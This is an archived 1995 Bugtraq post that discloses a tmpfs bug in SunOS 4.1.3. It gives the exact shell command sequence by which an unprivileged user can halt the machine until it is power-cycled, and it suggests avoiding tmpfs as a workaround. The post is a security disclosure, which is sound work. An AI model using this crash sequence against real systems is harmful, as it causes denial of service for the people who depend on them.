Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1995_4

Bugtraq archives for 4th quarter (Oct-Dec) 1995: Another tmpfs bug in SunOS 4

Another tmpfs bug in SunOS 4

Arfst Ludwig (Arfst.Ludwigluxor.in-berlin.de)
Sat, 2 Dec 1995 23:50:40 +0100

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Arfst Ludwig: "little whole on Suns concerning /dev/kbd"
Previous message: Rich Graves: "Re: Cracked: WINDOWS.PWL [most services accessed by any version"
Next in thread: Pete Shipley: "Re: Another tmpfs bug in SunOS 4"

Hi!

Unprivileged users can crash the system such
that a power down power up cyle is needed.

Vulnerable OS is (at least) SunOS 4.1.3.

With the right permissions (umask) the following
sequence crahes the system. The kernel does not
panic, nor the abort sequece enters the boot
promt, the system is halted, need to power down.

8<------------------------- cut here -------------------------
user1> cd /tmp
user1> mkdir foo
user1> su user2

user2> mkdir foo/bar
user2> touch foo/bar/{plop,blup}
user2> exit

user1> cd foo
user1> mv bar ..
8<------------------------- cut here -------------------------

/tmp's permissons are drwxrwxrwt root wheel

I have not explored this bug very much because of the
ungracefully consequences.

Workaround:
Avoid using (the marvelous) TMPFS filesystems :-(
or (IMHO even worse) switch to Solaris 2 ?

Cheers, Arfst
______________________________________________________________________
  __
 (00)   Arfst Ludwig
  \`\/  E-Mail: Arfst.Ludwigluxor.in-berlin.de
   ""   carpe diem

Next message: Arfst Ludwig: "little whole on Suns concerning /dev/kbd"
Previous message: Rich Graves: "Re: Cracked: WINDOWS.PWL [most services accessed by any version"
Next in thread: Pete Shipley: "Re: Another tmpfs bug in SunOS 4"